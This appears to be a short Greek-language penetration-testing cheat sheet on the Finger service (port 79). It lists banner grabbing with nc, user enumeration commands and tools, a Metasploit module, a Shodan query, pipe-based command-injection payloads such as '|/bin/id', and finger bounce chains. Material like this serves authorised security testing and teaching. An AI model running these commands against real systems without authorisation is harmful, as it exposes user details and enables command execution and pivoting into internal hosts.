79 - Pentesting Finger

Reading time: 3 minutes

Βασικές Πληροφορίες

Το πρόγραμμα/υπηρεσία Finger χρησιμοποιείται για την ανάκτηση λεπτομερειών σχετικά με τους χρήστες υπολογιστών. Συνήθως, οι πληροφορίες που παρέχονται περιλαμβάνουν το όνομα σύνδεσης του χρήστη, το πλήρες όνομα και, σε ορισμένες περιπτώσεις, επιπλέον λεπτομέρειες. Αυτές οι επιπλέον λεπτομέρειες μπορεί να περιλαμβάνουν την τοποθεσία του γραφείου και τον αριθμό τηλεφώνου (αν είναι διαθέσιμος), την ώρα που ο χρήστης συνδέθηκε, την περίοδο αδράνειας (idle time), την τελευταία φορά που διαβάστηκε το email από τον χρήστη και το περιεχόμενο των αρχείων σχεδίου και έργου του χρήστη.

Προεπιλεγμένη θύρα: 79

PORT   STATE SERVICE
79/tcp open  finger

Καταμέτρηση

Λήψη Πανό/Βασική σύνδεση

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Καταμέτρηση χρηστών

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Εναλλακτικά, μπορείτε να χρησιμοποιήσετε το finger-user-enum από pentestmonkey, μερικά παραδείγματα:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap εκτελεί ένα σενάριο για να χρησιμοποιήσει τα προεπιλεγμένα σενάρια

Το Metasploit χρησιμοποιεί περισσότερα κόλπα από το Nmap

use auxiliary/scanner/finger/finger_users

Shodan

• port:79 USER

Εκτέλεση εντολών

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Χρησιμοποιήστε ένα σύστημα ως δρομολογητή finger

finger user@host@victim
finger @internal@external